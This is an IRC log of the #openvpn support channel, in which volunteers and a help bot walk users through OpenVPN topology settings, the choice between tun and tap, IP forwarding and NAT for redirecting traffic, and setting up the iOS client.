12:16 -!- mongoman [~mongoman@200.46.98.147] has quit [Quit: Leaving]
12:20 -!- master_of_master [~master_of@p4FF242AF.dip.t-dialin.net] has quit [Ping timeout: 244 seconds]
12:42 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 272 seconds]
12:49 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has joined #openvpn
13:05 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
13:16 -!- xbanux [~xbanux@triband-mum-59.182.177.192.mtnl.net.in] has quit [Ping timeout: 244 seconds]
13:21 -!- Falteckz [~Falteckz@121.99.31.205] has joined #openvpn
13:29 -!- bluethundr [~dunphy@ool-457cd1ed.dyn.optonline.net] has joined #openvpn
13:30 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
13:41 < marksaitis> hey. I set up openvpn on my ubuntu 12.04 lts. Host has 10.8.0.1 mask 255.255.255.255, client has 10.8.0.6 mask 255.255.255.252. These ips are not set in any server or client configs, they come as default as I understand. I used the latest server and client config sample files and modified them according to the official ubuntu openvpn guide.
13:41 < marksaitis> however I cannot ping 10.8.0.1 from my client :))) is that to do with different masks? and why would I get different masks?
13:41 < marksaitis> please help
13:41 < marksaitis> I'm nearly there
13:44 -!- n2deep [n2deep@odin.sdf-eu.org] has quit [Ping timeout: 244 seconds]
13:46 < marksaitis> I actually do have this line in the server config by default, server 10.8.0.0 255.255.255.0, but it makes no sense as my server and client tun interfaces have different masks?
13:51 < marksaitis> my client is win7 though
13:57 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
14:08 < pekster> marksaitis: In net30 mode, Unix/Linux clients use a PtP configuration while Windows uses a /30
14:09 < pekster> Subnet topology avoids this behaviour and sets an IP/netmask instead of using a PtP or fake /30:
14:09 < pekster> !subnet
14:09 <@vpnHelper> "subnet" is http://www.subnet-calculator.com/ or http://en.wikipedia.org/wiki/Subnetwork
14:09 < pekster> Not that. let's try this:
14:09 < pekster> !topology
14:09 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this.
14:10 < pekster> marksaitis: What you're seeing on the server is normal and expected. If your OpenVPN connection works and doesn't error or time out, you probably have a firewall issue
14:15 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer]
14:17 -!- Devastator [~devas@177.18.198.56] has joined #openvpn
14:18 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds]
14:18 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 276 seconds]
14:24 < marksaitis> pekster, thank you. it all connects, but as I said I do get a strange mask on the windows client :)
14:24 < neilhwatson> Is mtu-disc yet supposed to prevent write UDPv4 [EMSGSIZE Path-MTU=1500]: Message too long (code=90) messages?
14:25 < pekster> marksaitis: That's the /30 behaviour I described. Did you see the bot's output above telling you how you can avoid that if you like?
14:25 < pekster> Also:
14:25 < pekster> !/30
14:25 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf
14:26 < marksaitis> I don't really understand this concept of /30 and ptp :) so it didn't make sense to me. Do I just need to add the topology subnet option in the client's config?
14:26 < marksaitis> pekster,
14:27 < EugeneKay> marksaitis - that's okay, /30 is confusing and stupid. Just do what the tl;dr says and you'll be fine.
14:27 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn
14:27 < marksaitis> pekster, also, the server's config file specifies 10.8.0.1 255.255.255.0, but ifconfig says tun0 has mask 255.255.255.255, is this normal?
14:28 < pekster> Yes, in both the p2p and net30 modes. It'll look more "normal" to what you expect if you just use topology subnet
14:29 < marksaitis> pekster, do I specify the "topology subnet" line in both server and client configs?
14:29 < pekster> You can do it in just the server config if the client uses 'client' or 'pull' and does *not* have any topology set
14:29 < EugeneKay> Just the server
14:30 < marksaitis> wonderful, this stuff should be default. It makes no sense to me :))) I mean stuff is configured to have network x options, but it gets z :)
14:30 < EugeneKay> !topology
14:30 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this.
14:31 < EugeneKay> The "why" is in the link there ^
14:31 < pekster> marksaitis: The issue is that the subnet topology is not supported for really old 2.0.9 clients
14:31 < pekster> I actually had to use one of those in the not-too-distant past due to an embedded (and highly messy) build system where building even 2.1.x was not practical (time vs cost, etc)
14:32 < EugeneKay> You poor bastard
14:32 < pekster> It was all Linux/Unix, so p2p worked fine
14:32 < pekster> No silly net30 there
14:33 < marksaitis> It now works fine!!! OMG :) thank you. If I were to have Linux clients only, I would not need such an option, yeah? :)
14:33 < pekster> topology subnet is recommended everywhere unless you have 2.0.9 clients that for whatever (bad) reason cannot be updated
14:33 < EugeneKay> It's a hack for Ye Olde Windows clients. Modernish ones work fine with it
14:33 < pekster> You can use p2p too, which is fine in an all-*nix environment, but subnet works fine too
14:34 < marksaitis> so if this mode is called "subnet topology", what is the older one called?
14:36 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
14:36 < pekster> See --topology in the manpage
14:36 < marksaitis> ok thank you :)
14:36 < pekster> Choices are net30 (the default), p2p, or subnet, with full descriptions as listed in the manpage
14:37 < pekster> !man
14:37 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
14:38 < marksaitis> reading it already, appreciate your help, fast and effective
14:38 < marksaitis> I got it, it allocates a whole subnet for 1 client, fair enough :)
14:40 < marksaitis> If I now bridge my windows tun adapter with the virtualbox adapter, I guess my vm will feel like it is in a private network with my server
14:40 < marksaitis> that's where I am heading with this stuff
14:40 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::] has quit [Ping timeout: 245 seconds]
14:42 < pekster> You don't bridge tun. tun is for routing, tap is for bridging
14:42 < pekster> !tunortap
14:42 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
14:42 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
14:43 < pekster> If you just want access to an internal VM LAN, tun is fine. Run openvpn on a box with access to the outside network and the inside one (often the VM host) and route between the networks
14:47 -!- vraa__ [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
14:50 -!- speed_racer8 [~speed_rac@98.196.168.201] has quit [Ping timeout: 272 seconds]
14:50 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 248 seconds]
15:03 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn
15:09 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn
15:09 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving]
15:11 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 245 seconds]
15:21 < marksaitis> pekster, is it difficult to make it so that my vpn clients see the internet through my server?
15:22 < marksaitis> Or is it just a few lines? I'm doing something now and I thought if it's quick I should enable it
15:26 < pekster> !redirect
15:26 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
15:26 <@vpnHelper> http://ircpimps.org/redirect.png
15:27 < marksaitis> pekster, that's a client option. How about the server? Will it take that traffic and route it to the server's eth0 gw?
15:28 < pekster> There's more than just the "client option" listed in that output
15:28 < pekster> IP forwarding, NAT, and firewall stuff is all handled at the server side
15:28 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Write error: Broken pipe]
15:29 < marksaitis> ok, so I will need to read about this a bit, yeah
15:29 < pekster> Each of the !words has more output available if you query the bot
15:29 < marksaitis> You see I am bridging my vm with tap on my windows host, the vm will only see my vpn server. Therefore I thought about how to quickly make my vpn server be a gw :)
15:30 < marksaitis> I thought it's just some sort of routing rule, 1 or 2 options
15:30 < pekster> One OpenVPN option, plus routing, plus NAT (if you're dealing with rfc1918 VPN IPs) and any necessary firewall config
15:30 < marksaitis> so I don't need to redirect all traffic to it in my case, as the vpn server gw is the only one my client can see
15:31 < pekster> You don't really need/want tap in your situation, unless you're specifically trying to avoid routing for some reason
15:32 < marksaitis> I will statically configure my client with a gw, now how do I make my server's tun adapter route these packets to eth0 for internet?
15:33 < marksaitis> I don't know what I need. I have my linux server in a datacentre sitting directly on an internet ip and stuff at home/office :)
15:33 < pekster> IP forwarding. Just like the bot output said. See the "!ipforward" word? If you type it, the bot tells you more
15:33 < marksaitis> my windows host has a vm client which I want to sit on a virtual network with my server on the internet.
15:33 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
15:33 < marksaitis> !ipforward
15:33 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall
15:34 < marksaitis> wooooo, kernel?
15:34 < marksaitis> I just want the server's tun to be a gateway to the internet :)
15:34 < marksaitis> I want routing
15:35 < pekster> So follow the directions for your OS/distribution to enable IP forwarding, firewall, and NAT. Just like the bot said
15:40 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has joined #openvpn
15:41 < marksaitis> ok thanx
15:42 < marksaitis> !linipforward
15:42 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT
15:43 < marksaitis> pekster, ok let's say I enable ip forwarding on the system. now what, how do I make 10.8.0.1 a functional gw for my clients? do I add a routing rule?
15:44 < pekster> IP forwarding turns it into a router. All the normal routing rules apply. Perhaps you'd like a more basic entry-level guide to how TCP/IP networking works?
15:44 < pekster> !tcpip
15:44 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
15:44 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
15:52 < marksaitis> I know how it works, headers and routing information etc... :)
15:52 < marksaitis> thanx anyway
15:53 < marksaitis> pekster, ip forwarding turns "what" into a router? the system?
15:54 < pekster> Yes. It tells the kernel to route packets that are not bound for the local system
15:55 < pekster> That's a pretty basic networking concept; if you don't have a good handle on basic networking, you should get that exposure first before you try and add openvpn to the mix. OpenVPN is hard to use without a functional understanding of how networking/routing/firewalls work
15:55 < pekster> !101
15:55 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc
15:56 < pekster> IP forwarding is generally just a "switch" if you'd like that says "route such packets" instead of the default of "ignore these packets." They then hit the routing rules and get sorted into a table and handled according to the routing rules. All of which is beyond the scope of openvpn (your OS/kernel does this)
16:01 < marksaitis> understood, I have a good basic understanding of it, just never enabled it on linux
16:05 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has quit [Ping timeout: 264 seconds]
16:09 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn
16:16 -!- Falteckz [~Falteckz@121.99.31.205] has quit [Quit: Leaving]
16:23 -!- vraa__ [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Quit: Leaving]
16:27 -!- dli_ [~dli@dsl-69-171-139-151.acanac.net] has quit [Ping timeout: 264 seconds]
16:32 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has joined #openvpn
16:44 < JackSparrow> hi, I'd like to redirect a port range from my server's public interface to one local IP
16:44 < JackSparrow> like eth0:42000 => tun0 10.8.0.42:42000
16:45 < JackSparrow> I've already tried lots of iptables things, none of them worked.
16:49 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving]
17:03 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn
17:05 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has quit [Ping timeout: 264 seconds]
17:09 < marksaitis> pekster, would you have any idea? I connected to the openvpn server with my host - all ok, I got the IP 10.8.0.4 with it, can ping 10.8.0.1 just fine. I run a vm on my host, therefore I bridged the vm with the host's tun adapter, but my vm does not get any ip and moreover if I statically configure it, it is still a no-go. Any ideas?
17:09 < marksaitis> what can I be missing here
17:09 < marksaitis> :)
17:09 -!- bluethundr [~dunphy@ool-457cd1ed.dyn.optonline.net] has quit [Quit: bluethundr]
17:11 < pekster> You cannot bridge a tun adapter, as I stated earlier. It does not work. http://paste.kde.org/685820/
17:16 < marksaitis> really, omg
17:16 < marksaitis> how do I go about it then pekster ?
17:17 < marksaitis> I mean all I did is specify bridge to the tun adapter using virtualbox :)
17:17 < marksaitis> on my host client
17:18 < marksaitis> does it mean that I would need to use routing on my host then? and set my vm to do host-only networking? :)
17:18 < marksaitis> is that the only way do you think?
17:19 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
17:19 -!- mode/#openvpn [+o krzee] by ChanServ
17:24 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
17:24 < pekster> marksaitis: You *cannot* bridge tun adapters. for the 3rd time. tun is OSI Layer 3. Ethernet is OSI Layer 2. You cannot do what you propose
17:25 < pekster> Maybe the silly "WIN32 TAP Adapter" in windows pretends to let you do it, but it does not work because OpenVPN is unable to send Ethernet frames in tun mode. That's how tun works
17:28 < pekster> Learn to route properly between your subnets, or use tap if you actually wanted a bridge
17:30 < marksaitis> alright, in my scenario I should use tap then, yeah?
17:32 < pekster> Not unless you actually need to send Layer 2 frames (Ethernet) between your hosts
17:32 < pekster> If you do not need Layer 2 protocols, you should use tun unless you have a very good reason not to
17:32 < pekster> In case you missed it above:
17:32 < pekster> !tunortap
17:32 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
17:32 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
17:33 -!- dli_ [~dli@dsl-69-171-139-151.acanac.net] has joined #openvpn
17:42 < marksaitis> well, ok. I know what these layers are. I just didn't know tun and tap. I do know that tun is more efficient
17:42 < marksaitis> so tun is layer 2 ethernet frames, tap is layer 3 packets, yeah
17:43 < marksaitis> whoops, the other way round I meant :)
17:44 -!- JackSparrow [~death@2001:41d0:1:d4e5:1234:1234:1234:1234] has joined #openvpn
17:44 < marksaitis> tun layer 3, tap layer 2
17:45 < marksaitis> which means in layer 2 ip packets get encapsulated into ethernet frames and that's where the overhead comes from
17:46 < marksaitis> I get it. I just don't understand then, if tun works in layer 3, why I cannot ask my host to take that ip packet and route it
17:48 < pekster> You can. This is not done by "bridge to tun adapter using virtualbox" as you said earlier
17:49 < marksaitis> yeah, that stuff doesn't work. In which case I need to tell my host to do some routing, yeah
17:49 < marksaitis> whichever way I go, I just want my vm to feel like it is in a lan with my server on 10.8.0.1
17:50 < pekster> So put openvpn on the VM and have it connect as a client. Done.
17:51 -!- brute11k1 [~brute@89.249.230.53] has quit [Quit: Leaving.]
17:56 < marksaitis> pekster, I can't do so :)))
17:57 < marksaitis> because my vm needs to be in the network before the OS starts as well
17:57 < marksaitis> and surely before someone logs in
18:03 < marksaitis> pekster, so am I better off using tap and then bridging it, or using tun and doing some routing on the host? it's just that I guess the host would receive stuff from the vm and it would route it through the main connection instead of the tun adapter..
18:04 -!- Netsplit *.net <-> *.split quits: hive-mind, daemoen, rkantos, gardar, jtrucks, batrick
18:04 -!- rkantos [robin@109.169.7.197] has joined #openvpn
18:04 -!- Netsplit over, joins: jtrucks
18:04 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
18:05 -!- Netsplit over, joins: gardar
18:05 -!- Netsplit over, joins: batrick
18:05 -!- Netsplit over, joins: daemoen
18:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
18:09 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
18:21 <@krzee> marksaitis, tun or tap is a decision that is unrelated to that
18:21 <@krzee> the only thing that goes into tun or tap is "do I need a layer2 protocol over my vpn?"
18:21 <@krzee> yes = tap, no = tun
18:21 <@krzee> and then further, if I DO need layer2… "do I need layer2 to the LAN behind the vpn?"
18:21 <@krzee> yes = bridge, no = routed
18:22 <@krzee> meh maybe I should make a small flowchart for that sometime
18:24 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
18:24 < marksaitis> in my case I can't make it work with tun, however I switched everything to tap and it works now :) the only thing is, I do have ip forwarding enabled on my openvpn server system, but it doesn't do that for me :( does it need a restart maybe
18:24 <@krzee> if it's windows yes
18:24 < marksaitis> krzee, I do understand what you are saying :)
18:24 < marksaitis> openvpn server is linux
18:25 <@krzee> sysctl -a|grep forward
18:25 <@krzee> !linipforward
18:25 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT
18:25 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn
18:25 < vaillor> hi guys
18:25 < marksaitis> that's what I did :)
18:26 < marksaitis> I have no iptables there
18:26 < vaillor> openvpn is a stand alone service?
18:26 <@krzee> vaillor, as opposed to what?
18:26 < vaillor> because I installed https://itunes.apple.com/us/app/openvpn-connect/id590379981 on my iphone
18:26 <@vpnHelper> Title: OpenVPN Connect for iPhone 3GS, iPhone 4, iPhone 4S, iPhone 5, iPod touch (3rd generation), iPod touch (4th generation), iPod touch (5th generation) and iPad on the iTunes App Store (at itunes.apple.com)
18:26 < vaillor> and it asks me to login
18:26 <@krzee> did you import a config?
18:26 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds]
18:27 < vaillor> no
18:27 < vaillor> how to do it?
18:27 <@krzee> your server is a normal opensource openvpn, right?
18:27 <@krzee> (or AS?)
18:27 < vaillor> it is a linux debian terminal
18:28 <@krzee> there's 2 ways to import your configs
18:28 <@krzee> 1 is through itunes (where you can add files)
18:28 <@krzee> other is via email
18:28 <@krzee> can you do the itunes way?
18:29 < vaillor> ok, but why is there a sign-in form?
18:29 < vaillor> yes
18:29 <@krzee> OpenVPN Connect is the official full-featured iPhone/iPad client for the OpenVPN Access Server, Private Tunnel and OpenVPN Community
18:29 <@krzee> because it supports 3 things
18:29 <@krzee> you are using openvpn community
18:29 <@krzee> if you were using one of the other 2 maybe the login stuff would matter
18:30 < vaillor> how does this app work? usually iphone apps are jailed
18:30 <@krzee> it is jailed
18:30 <@krzee> there is a VPN API in ios
18:31 < vaillor> that makes it not jailed?
18:32 <@krzee> it is jailed
18:32 <@krzee> it doesn't need root now
18:32 <@krzee> same with the newer android versions
18:33 < vaillor> so, all the apps on my iphone can connect through the openvpn network?
18:33 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
18:33 <@krzee> depends on your config
18:33 <@krzee> but yes it's possible
18:33 < vaillor> in what sense does it depend on my config?
18:34 <@krzee> openvpn doesn't ALWAYS redirect internet
18:34 <@krzee> it only makes a secure connection between 2 hosts
18:34 <@krzee> what you do on top of that is up to your configs
18:34 <@krzee> (or scripts or whatever)
18:34 <@krzee> also, I strongly recommend testing your setup outside of the iphone first
18:34 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Quit: leaving]
18:35 <@krzee> get it running how you want from another machine, then use that config on the iphone
18:35 < vaillor> I'm usually using IPsec, which is natively supported by ios, and it always redirects my connection
18:35 <@krzee> congratulations, have a cookie =]
18:35 < vaillor> the problem is that ipsec is at the network layer
18:35 <@krzee> !redirect
18:35 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
18:35 <@vpnHelper> http://ircpimps.org/redirect.png
18:36 < vaillor> is it a flow-chart?
18:36 <@krzee> ?
18:36 < vaillor> the link
18:36 <@krzee> the last one is
18:37 <@krzee> but I was showing you the info of what you'll need to redirect internet over your vpn
18:37 <@krzee> and like I said, get another client working BEFORE you try the iphone
18:37 <@krzee> iphone is less ideal to troubleshoot your entire vpn on
18:38 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 272 seconds]
18:38 < vaillor> ok
18:38 <@krzee> then when we know the server is how you want it, and you have a working client config from the test client, then we toss it on the iphone
18:38 < vaillor> thank you for helping me
18:39 <@krzee> you're welcome
18:40 < vaillor> ah, so, last question, does the openvpn app support http proxy?
18:41 <@krzee> I'm not sure if the ios version does or not, openvpn community version definitely does
18:41 <@krzee> ios version is a re-write, closed source (otherwise apple store wouldn't take it)
18:41 <@krzee> so not *everything* is in it
18:41 <@krzee> !man
18:41 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
18:41 <@krzee> theres proxy stuff in there 18:42 -!- mode/#openvpn [+vvvv pekster soapee01 rob0 oc80z] by krzee 18:42 -!- mode/#openvpn [+vv EugeneKay _quadDamage] by krzee 18:43 -!- JSharpe [~JSharpe@146.185.24.18] has quit [Quit: Leaving] 18:43 < vaillor> unfortunately i need it to pass throught a protocol inspecting firewall that make it pass only http and https traffic, so i need to use an http proxy relay with CONNECT method to make it pass other stuff in 18:43 <@krzee> which im sure is tcp only 18:44 <@krzee> and only takes tcp 18:44 <@krzee> so then you have a tcp proxy, tcp openvpn, and tcp inner traffic 18:44 <@krzee> you'll have issues 18:44 <@krzee> !tcp 18:44 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 18:44 <@krzee> ESPECIALLY when on 3g or similar 18:44 < marksaitis> krphop, I enabled ip forwarding for sure on my linux openvpn server, but it still doesnt do it :) how can I diagnose it? 18:45 < vaillor> i can hide traffic with an ssl tunnel supported by firewall, because it supports https 18:45 < vaillor> so, firewall can't know anymore what's passing in ssl tunnel 18:46 <@krzee> irrelevant to the problem you'll have 18:47 < vaillor> for example on my server i created a https proxy with squid 18:47 < vaillor> from the pc client i use stunnel like a wrapper 18:48 < vaillor> stunnel establish an encrypted ssl tunnel with proxy. and with my application like, irc, skype and so on, i connect to stunnel that conencts to proxy server that connects to the origin server 18:49 <@krzee> i understand 18:49 <@krzee> read this: 18:49 <@krzee> !tcp 18:49 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. 
http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay
18:49 <@krzee> link #1
18:49 <@krzee> that is talking about tcp over tcp
18:49 <@krzee> you are going to do tcp over tcp over tcp
18:50 <@krzee> and then im guessing you may connect over 3g / 4g from time to time
18:50 <@krzee> your connection is likely going to be crap, with ever increasing latency until disconnect
18:50 <@krzee> then reconnect, rinse and repeat
18:52 <@krzee> marksaitis, show me the following in pastebin: cat /proc/sys/net/ipv4/ip_forward ; iptables -v -L
18:53 < marksaitis> krzee, http://pastebin.com/7s5J8rr8
18:54 <@krzee> marksaitis, you said the server is some sort of virtual machine?
19:00 < marksaitis> the server is in datacentre, directly connected to the internet ip. my openvpn client is a vm at home on my windows host :)
19:00 <@krzee> oh ok, so lets re-diagnose the issue
19:00 <@krzee> !goal
19:00 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
19:01 <@krzee> sharing server lan or redirecting internet over vpn?
19:02 < marksaitis> tap is configured, I can ping openvpn host 10.8.0.1 from my client which is vm bridged with tap adapter on vm-host which is connected to openvpn server. I can not ping google.com from vm client but can ping 10.8.0.1
19:02 <@krzee> !configs
19:02 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn.
or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
19:06 < marksaitis> krzee, http://paste.ubuntu.com/5580923/ http://paste.ubuntu.com/5580926/
19:07 <@krzee> read this again
19:07 <@krzee> !configs
19:07 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
19:07 <@krzee> read the whole thing, it says more than just "paste your configs with 1000 lines of comments"
19:07 < marksaitis> ok :))))))
19:09 < marksaitis> http://paste.ubuntu.com/5580935/
19:10 < marksaitis> http://paste.ubuntu.com/5580937/
19:18 <@krzee> you arent telling openvpn to redirect your internet over the vpn
19:18 <@krzee> therefore openvpn is correct not to
19:19 <@krzee> !redirect
19:19 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
19:19 <@vpnHelper> http://ircpimps.org/redirect.png
19:19 <@krzee> see the troubleshooting flowchart
19:19 <@krzee> last link, #4
19:20 <+rob0> Nombre quatro, se~or.
19:20 <+rob0> por favor!
19:21 <@krzee> name four, ??-??
19:21 <@krzee> please!
19:21 <@krzee> thats the translation for that one, lol
19:21 <@krzee> ohh señor :D
19:22 <@krzee> s/Nombre/numero/
19:22 <@krzee> :D
19:23 <+rob0> oh oops
19:23 <+rob0> I plead the fifth.
19:24 <@krzee> lol lol
19:24 <@krzee> I PLEAD THE FIF
19:24 <@krzee> 1 2 3 4 FIF
19:24 <+rob0> I plead the 750ml bottle.
19:24 <+pekster> Plead the forth: it's more fun. http://xkcd.com/496/
19:24 <@vpnHelper> Title: xkcd: Secretary: Part 3 (at xkcd.com)
19:24 <+pekster> Oh, that was the third. I suppose I should read comics before I quote from them, 'eh?
19:25 <@krzee> http://www.ebaumsworld.com/video/watch/81460739/
19:25 <@vpnHelper> Title: DAVE CHAPPELLE - I PLEAD THE FIF - Video (at www.ebaumsworld.com)
19:27 <+rob0> Oops. I even got the bottle wrong. It's 1.5 liter!
19:27 * rob0 crawls under Iraq
19:30 <@krzee> lol nice comic
19:30 <@krzee> the auto-troll shuffle!
19:32 -!- Zhvtar is now known as zhvtar
19:36 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn
19:42 < marksaitis> krzee, I thought it might be that... but I specified in vm client static gw, also I dont want my vm host to have all internet redirected thru openvpn tap adapter
19:43 <@krzee> marksaitis, whats your goal
19:43 <@krzee> what DO you want?
19:44 <@krzee> your configs simply make a connection between client and server, and that is working
19:44 <@krzee> before i can help you go further, i need to know what you want
19:46 <@krzee> rob0, http://xkcd.com/1168/
19:46 <@vpnHelper> Title: xkcd: tar (at xkcd.com)
19:46 * rob0 wants more booze
19:46 <+rob0> hehe
20:05 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds]
20:06 -!- MFSOT [~garret@c-24-34-166-26.hsd1.ma.comcast.net] has joined #openvpn
20:07 < MFSOT> having trouble connecting my win7 client to my pfsense openvpn server, anyone with some experience in this realm hanging out tonight?
